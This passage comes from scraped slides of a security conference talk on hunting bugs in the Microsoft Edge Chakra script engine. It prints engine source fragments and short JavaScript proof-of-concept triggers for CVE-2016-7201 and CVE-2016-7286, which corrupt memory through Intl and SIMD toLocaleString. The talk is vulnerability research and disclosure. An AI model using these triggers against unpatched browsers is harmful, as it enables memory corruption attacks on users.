writable: true, enumerable: false, configurable: true });In natives:if (!Js::JavascriptOperators::GetProperty(intlObject, objectPropertyId, &propertyValue, scriptContext)){ return; }if (!Js::JavascriptOperators::GetProperty(prototypeVal = DynamicObject::FromVar(propertyValue), Js::PropertyIds::resolvedOptions, &propertyValue, scriptContext))
![Page 67: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/67.jpg)
CVE-2016-7201 var d = Object.defineProperty;var noobj = { get: function () {return 0x1234567 >> 1;}};function f(){
var i = Intl;d(i, "Collator", noobj);
}
Object.defineProperty = f;var q = new Intl.NumberFormat(["en"]);
![Page 68: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/68.jpg)
Simple Error
● It happens!
![Page 69: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/69.jpg)
CVE-2016-7286Var* newArgs = HeapNewArray(Var, numArgs);switch (numArgs){case 1: break;case 2: newArgs[1] = args[1]; break;case 3: newArgs[1] = args[1]; newArgs[2] = args[2]; break;default: Assert(UNREACHED);}
![Page 70: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/70.jpg)
CVE-2016-7286
var v = SIMD.Int32x4(1, 2, 3, 4);v.toLocaleString(1, 2, 3, 4)
![Page 71: Hunting bugs in the Microsoft Edge Script Engine …conference.hitb.org/hitbsecconf2017ams/materials/CLOSING...What are Edge and Chakra Edge: Windows 10 browser Chakra: Edge’s open-source](https://reader031.vdocument.in/reader031/viewer/2022011913/5fb48b33e1ab3f67826d39c6/html5/thumbnails/71.jpg)
Conclusions
● ECMAScript has a lot of features● JavaScript design implementation decisions affect bug
types● Understanding design decisions is important